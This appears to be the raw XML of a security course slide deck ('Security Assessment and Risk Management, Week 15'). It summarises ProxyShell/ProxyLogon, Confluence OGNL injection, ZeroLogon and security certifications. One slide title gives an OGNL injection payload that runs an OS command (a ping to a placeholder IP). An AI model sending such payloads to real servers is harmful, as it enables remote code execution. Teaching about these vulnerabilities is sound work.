            <a:endParaRPr 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123658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2887AA9-1D65-4C52-99CE-31501405935A}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>36</a:t>
            </a:fld>
            <a:endParaRPr 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30136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A65028C-B1DF-425E-9119-E92E0D0E6731}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3540135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8E9727E-0638-4E5C-B757-78C300D5CEF2}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>38</a:t>
            </a:fld>
            <a:endParaRPr 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577862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D606CCE-BBB8-4182-A69C-1AC0E8F76F1D}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3347049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6D7553A-1B3E-4C5D-8A1B-22BB551ACF74}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>19</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55294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9E4A686-DF7E-44E5-98B4-3E717CA98565}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>20</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="52751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B48164E-7091-4037-BE6E-2020C23DF31E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="353760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2B6F867-C260-4A49-8DFE-02C559F6F073}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>22</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256655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7DC0F6A-7377-4381-AFC9-F12E935CBE1B}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>25</a:t>
            </a:fld>
            <a:endParaRPr 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730178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4C8AABA-737F-45E0-B988-25F674BBBFBC}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>26</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1200"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1949291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3EB2620-DFF2-4843-9359-5E9F3D3E15B1}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>29</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273000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697E09D-832C-4385-927E-F7CDB1A21A7E}" type="slidenum">
              <a:rPr lang="en-US" sz="1200" smtClean="0"/>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:t>30</a:t>
            </a:fld>
            <a:endParaRPr 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68902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6359-9BB8-4148-8114-537E698DA205}"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64355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49BD0-10DB-43E7-8F22-40B3D51B8FC3}"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865438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6C79C-F566-427A-93F6-434A4E613134}"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5533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6191F-481E-48E9-BB9A-369A67A7362D}"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12491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677DE-DD04-48CC-9C18-7BE9FF2DEB6B}"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9754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81093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2F23D-51F6-4C94-8CD5-B9ABBF67EE23}" type="datetime1">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64562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A702F-6367-4FD1-89A8-3744BE6BA9A2}" type="datetime1">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137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E99BD-4B4F-4460-B452-0E8146ACCF8F}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>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2928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6FD34C-1867-42A9-AC54-D15ADD8A65E7}" type="datetime1">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7333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6133E9-A654-4C17-8C3C-DDCAC83D6EBF}" type="datetime1">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627626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9D389-4C4C-4FD7-9E6B-9F44477F0EB8}" type="datetime1">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>5/9/2022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838831872"/>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huntress.com/blog/proxyshell-vs.-proxylogon-whats-the-differen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rendmicro.com/en_us/what-is/zerologo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tted lines connected to form a network">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08F69B94-28DD-4BB3-9CC4-93CCC60A87A9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix amt="35000"/>
          </a:blip>
          <a:srcRect t="8096" r="-1" b="1519"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="20" y="10"/>
            <a:ext cx="12188932" cy="6857990"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Title 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B576734B-6BE8-4EE2-A57A-8E68A3D68E40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530351" y="1122363"/>
            <a:ext cx="9787864" cy="1978346"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security Assessment and </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Risk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Subtitle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BEB191A4-9BAA-4181-9FB9-91B9F2934CB4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="530351" y="3509964"/>
            <a:ext cx="9787864" cy="1256000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Week 15 – Lil Bits</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="9801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67CA-0EF4-493E-A4FC-2A7B0C882D8E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProxyShell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProxyLogon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4103C2B7-816A-4A53-B22C-05DC71887FEE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The vulnerabilities lie in the Microsoft Client Access Service (CAS), which is commonly exposed to the public internet. This exposure has led to widespread exploitation by threat actors.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.huntress.com/blog/proxyshell-vs.-proxylogon-whats-the-difference</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="180898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798A-F9BA-4655-824C-DBD9F7C41DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confluence OGNL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4098" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9228E990-F33D-485E-AF7B-E520BCB31D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5592" y="1451081"/>
            <a:ext cx="9540815" cy="5406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19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798A-F9BA-4655-824C-DBD9F7C41DA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Confluence OGNL Injection</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{842A214D-E4D0-482F-B41E-3F6AAE99B6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0536" y="1530306"/>
            <a:ext cx="10230928" cy="532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311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2F22-D344-4C6C-84BA-D3574A81BBD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>${@java.lang.Runtime@getRuntime().exec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>('ping%20-c%203%20&lt;IP_ADDRESS&gt;')}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6146" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A7723CBF-120E-42AD-94AC-5A157DC598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1087" y="-8133"/>
            <a:ext cx="9609826" cy="6866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2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984D-A7B5-470D-AE5D-E5AB1DBD2E79}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ZeroLogon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8F06AE5F-76D1-4EFA-BAE3-F016D70C4684}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Zerologon</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is the name given to a vulnerability identified in CVE-2020-1472. It comes from a flaw in the logon process: The initialization vector (IV) is set to all zeros all the time, while an IV should always be a random number.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>https://www.trendmicro.com/en_us/what-is/zerologon.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2079877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91B0-0C6D-41AC-A052-D75F33DA0A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426076" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ZeroLogon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="CVE-2020-1472漏洞分析 | ki9mu's blog">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAF6865D-F978-4D7B-BDE3-626FEC68F1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2543" y="0"/>
            <a:ext cx="8879457" cy="6843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93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91B0-0C6D-41AC-A052-D75F33DA0A3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426076" y="365125"/>
            <a:ext cx="10515600" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ZeroLogon</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7170" name="Picture 2" descr="CVE-2020-1472漏洞分析 | ki9mu's blog">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DAF6865D-F978-4D7B-BDE3-626FEC68F1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2543" y="0"/>
            <a:ext cx="8879457" cy="684363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790441ED-C989-4BDB-B03F-4E3BBF09C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543" y="-1"/>
            <a:ext cx="8879457" cy="679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912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normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Information Security Professional Credentials</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Many organizations rely to some extent on recognizable professional certifications to ascertain the level of proficiency possessed by any given candidate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Because some certification programs are relatively new, their precise value is not fully understood by most hiring organizations</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The certifying bodies work diligently to educate their constituent communities on the value and qualifications of their certification recipients</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Employers struggle to match certifications to position requirements, while potential information security workers try to determine which certification programs will help them in the job market </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{C956EAA0-BEB8-4C1D-B50E-3318A1993D36}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1753597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(ISC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Certifications</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The International Information Systems Security Certification Consortium (ISC)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="30000" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> offers security certifications, among them:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Information Systems Security Professional (CISSP) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Systems Security Certified Practitioner (SSCP), </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Secure Software Lifecycle Professional (CSSLP)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{B35ACD77-6CE1-4D68-A32D-ED77FA246E4D}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1044650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p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Certified Information Systems Security Professional (CISSP) </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21509" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Considered one of the most prestigious certification for security managers and CISOs, the CISSP certification recognizes mastery of an internationally recognized common body of knowledge (CBK) in information security, covering these domains: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Access control</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Business continuity and disaster recovery planning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cryptography</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>InfoSec governance and risk management</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Legal, regulations, investigations, and compliance</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Operations security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Physical (environmental) security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security architecture and design</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Software development security</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Telecommunications and network security</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Slide Number Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{12F3DDB3-3E9E-4785-BE7F-BD6E309EF395}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>19</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394865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2F6B-1F36-4E09-AD51-8468B5551552}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>McCumber</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Cube</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9218" name="Picture 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7103D9F6-3B03-4125-99AA-8579169BE4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43350" y="1924844"/>
            <a:ext cx="43053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23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CISSP Concentrations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22531" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
